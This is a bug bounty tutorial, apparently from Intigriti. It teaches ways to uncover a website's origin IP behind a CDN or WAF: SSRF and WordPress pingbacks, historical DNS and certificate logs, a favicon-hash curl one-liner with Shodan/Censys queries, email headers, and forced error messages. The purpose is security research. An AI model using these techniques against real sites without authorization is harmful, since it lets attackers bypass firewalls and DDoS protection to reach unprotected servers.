How to identify the origin IP

Most of your targets often resort to using content delivery networks (CDNs) or other anti-DDoS reverse proxies to mask their origin IP, protecting the origin server from possible (injection) attacks while also improving content delivery speed. However, when access is misconfigured, it makes it possible for us to directly access the origin server while bypassing the web application firewall.

In this article, we’ll explore common ways to identify the origin server’s IP to bypass the reverse proxy, including some more advanced methods.

Let’s dive in!

Contrary to a forward proxy, a reverse proxy is an intermediary server that is located between the origin server and the client (you). Its main task is to forward client requests to the appropriate backend servers and then return the server’s response to the client.

Common use cases for a reverse proxy server include:

• Load balancing: Distributing incoming requests across multiple backend servers to prevent any single server from becoming overwhelmed. If you have three web servers, the reverse proxy will equally distribute the load between them.

• SSL termination: Handling the encryption and decryption of HTTPS traffic, which reduces the computational load on backend servers.

• Caching: Storing frequently requested content so it can be served quickly without hitting the backend servers every time.

• Security: A Web Application Firewall (WAF) acts as a shield that can filter malicious requests, hide server details (or add security headers), and provide (D)DoS protection.

• Compression: Reducing bandwidth usage by compressing responses before sending them to clients.

Popular reverse proxy solutions like Nginx & Apache HTTP Server, and cloud services like Cloudflare & Akamai help developers with all these aforementioned tasks. As all security researchers, we are particularly interested in bypassing security filters, such as Web Application Firewalls (WAFs) that block our payloads.

To avoid direct IP access, developers must ensure that the origin server only accepts incoming connections from the reverse proxy (often done with a firewall). This setup ensures that even if the origin IP is obtained, the origin server will refuse to accept any requests that are not routed and validated via the reverse proxy.

In practice, the contrary is often the case. Many origin servers do not filter by IP and will return the full website content even when accessed directly by IP. This allows us to bypass the security validation and filters that are present on the origin server.

We’ve learned so far what reverse proxies are and the importance of identifying the server’s origin IP. Let’s now take a look at common ways you can leak your target’s origin IP.

Server-side request forgery

Server-side request forgeries allow us to induce the origin server to make an outbound connection to any external resource, including our server. With proper logging, we will be able to identify the server’s origin IP, making it possible for us to bypass CDN and firewall protections entirely.

Abusing WordPress XML RPC to find the origin IP

WordPress provides an XML-RPC endpoint to allow developers to automate certain tasks. One particular feature we’re interested in is the pingback method. Although a simple pingback is often considered harmless, it is perfect to help induce the origin server to make an outbound request to our end.

Reading tip: Dive deeper into finding and exploiting advanced server-side request forgery vulnerabilities! We’ve also included a list of the most commonly vulnerable application components you should pay attention to on your next target.

Historical DNS records

Historical DNS datasets can also help us identify the origin server’s IP. If, for instance, the reverse proxy service was added after the origin server was first indexed by an indexing tool (such as Censys, SecurityTrails, Shodan, etc.), it will make it possible for us to find the origin server’s IP by examining the historical data of a specific DNS record.

Furthermore, you can also apply the same methodology to subdomains or subsidiary assets of your target, as they can often reveal more information than primary domains. Let’s take a look at a comparable way to find more interesting data that could help us in identifying the server’s origin IP.

Historical SSL certificate records

Similarly to how DNS indexing services work, there are also other services that cover certificate transparency logs. CRT.SH is a popular tool that keeps records of SSL/TLS certificate changes and can help us query historical certificate logs, including any certificates that have been issued to our origin host.

Let’s take a look at an example:

In this instance, we can see that Cloudflare was recently added. This leaves room for us to explore the previously issued certificates and specifically pay attention to the “Subject Alternative Name” attribute, as it often contains the IP and/or the (internal) hostname of the origin server.

Favicon hash via Shodan / Censys

Favicons are the small icons that appear on the web browser’s tab (next to the page title). The same icons can also be used to find similar hosts that are related to our target, including the origin server that’s behind the reverse proxy.

To do so, we’ll need to calculate the hash of the favicon icon file. Here’s a simple one-liner using cURL, base64, and the MMH3 Python3 library to calculate the hash of any favicon to use in your Shodan or Censys query:

curl -s '/favicon.ico' | base64 | python3 -c 'import mmh3,sys;print(mmh3.hash(sys.stdin.buffer.read()))'

Afterward, we will need to use Shodan or Censys to query for hosts with a matching favicon. This will allow you to list all similar hosts, including your target’s origin server:

Email headers

Another common way to find the server origin IP is by examining email server headers. Legacy application components are often designed to send emails from the origin server instead of a third-party service like SendGrid or Amazon SES.

With this in mind, we can practically invoke the application component to send us an email and examine the email headers. The “Received” header contains the IP address from which the email was sent. On some occasions, other (custom) headers are added to the email that may include the origin IP as well.

Using a service like Shodan, Censys or IpInfo, we will be able to verify if this particular IP matches the origin server’s IP.

Hard-coded IPs and unique strings

On some occasions, you’ll come across unique string values reflected in your target’s server response that can be used with tools like Shodan and Censys to find the origin server. Let’s take a look at a few examples.

Deliberately triggering errors

Deliberately triggering errors by injecting special characters or sending over requests with unusual payloads might cause exceptions. Depending on the verbosity level, some applications will return more information than necessary, including information about the host (such as the origin IP).

Sometimes, IP or other references to the origin host can also be found in HTML code (usually in the form of comments).

Copyright

With tools like Google, Shodan & Censys, we can search for similar assets based on a unique string, such as the copyright string. In some cases, we will be able to find the origin’s host behind the reverse proxy.

With Google, it’ll only take us a simple search. You may have to exclude the root domain to further narrow down your searches.

Reading tip: Learn how to use Google dorking to find more security vulnerabilities, legacy assets, and forgotten endpoints.

On Shodan or Censys, we’ll have to make use of a special search syntax to narrow down our searches to match strings in an HTTP response:

Shodan:

http.html:"© copyright "

Censys:

services.http.response.body:"© copyright "

Targets may also include other forms of unique IDs and strings in HTTP responses (such as analytics scripts and Google Tag Manager IDs, custom response headers, etc.). You can apply the same method in order to attempt to find the origin server.

Identifying the server’s origin IP can help you bypass several restrictions that have been set on the reverse proxy server, including any security validations (such as Web Application Firewalls). However, in some cases, it can be tricky to identify the origin IP. In this article, we went over various ways you could, with high accuracy, practically disclose your target’s server origin IP.

So, you’ve just learned how to find the server’s origin IP to bypass WAFs… Right now, it’s time to put your skills to the test! You can start by practising on vulnerable labs and CTFs or… browse through our 70+ public bug bounty programs on Intigriti and who knows, maybe earn a bounty on your next submission!

START HACKING ON INTIGRITI TODAY